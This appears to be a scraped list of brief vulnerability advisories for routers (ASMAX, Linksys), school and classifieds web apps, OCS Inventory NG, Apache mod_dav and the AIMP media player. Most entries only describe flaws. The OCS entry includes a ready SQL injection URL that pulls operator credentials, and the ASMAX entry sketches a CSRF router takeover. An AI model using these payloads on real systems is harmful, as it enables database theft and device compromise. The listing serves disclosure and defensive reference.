ASMAX 804 gu router is a SOHO class device which provides ADSL / WiFi / Ethernet interfaces. There is an unauthenticated maintenance script (named 'script') in /cgi-bin/ directory of the web management interface. When 'system' paramether is passed to the script it allows running OS shell commands (as root). Using CSRF attack one could remotely own a router using for example simple <img> html tags pointing to http://192.168.1.1/...
Online Grades & Attendance is a web-based application for schools which is vulnerable to SQL Injection.
This exploit will exhaust all system memory of an Apache mod_dav or svn server. It needs authentication on normal DAV, but svn might let the PROPFIND slip through without authentication. It is launched by sending a PROPFIND request with an XML bomb to the server.
A Blind SQL Injection vulnerability exists in Escon SupportPortal Pro 3.0. The vulnerable parameter is 'cat' and 'tid' in the 'forum.php' file. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerable code is located on lines 60-71 of the 'forum.php' file.
Open-school is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries in the back-end database, allowing the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
The vulnerability exists due to insufficient sanitization of user-supplied input in the 'page' parameter of the 'index.php' script. An attacker can inject arbitrary SQL commands to the application and execute them in the context of the application. Also, the application is vulnerable to XSS due to insufficient sanitization of user-supplied input in the 'name', 'sender_email' and 'message' parameters of the 'contact_form.php' script. An attacker can inject arbitrary HTML and script code to the application and execute it in the context of the application.
AIMP version 2.51 build 330 suffers from a stack based buffer overflow vulnerability that can be exploited via malicious media file that supports ID3 tags (mp3). EIP and ECX registers gets overwritten, including the SE handler and the pointer to the next SEH record. The issue is trigered by playing the file (crashes within 5 seconds) or by viewing the file's metadata or by pressing the F4 key and selecting the ID3v1 or ID3v2 tab.
The Open Computer and Software (OCS) Inventory Next Generation (NG) provides relevant inventory information about system configurations and software on the network. The server can be managed using a web interface. It was found that the application does not properly sanitize user input which results into multiple SQL injections. Affected are the following scripts: download.php (parameters `N', `DL', `O' and `V') and group_show.php (parameter `SYSTEMID'); Attackers may be able to manipulate SQL statements in such a way that they can retrieve, create or modify information stored in the database. Furthermore, the SQL injection might allow attackers to get a foothold on the underlying system. The vulnerability can be exploited by just using a web browser: http://example.org/ocsreports/download.php?n=1&dl=2&o=3&v=4'union+all+select+concat(id,':',passwd)+from+operators%23
RadCLASSIFIEDS Gold v2 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'search' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable script. This can be exploited to gain access to the database and extract sensitive information such as usernames and passwords.
The Linksys WAG54G2 router is a popular SOHO class device that provides ADSL / WiFi / Ethernet interfaces. When logged into the web management console, it is possible to execute commands as root. An attacker can exploit this issue remotely (using CRSF) assuming that a victim did not change the default password to the web management. The vendor (Cisco) was contacted in March '09 and confirmed the issue (but still it remains unpatched).
Services By CQR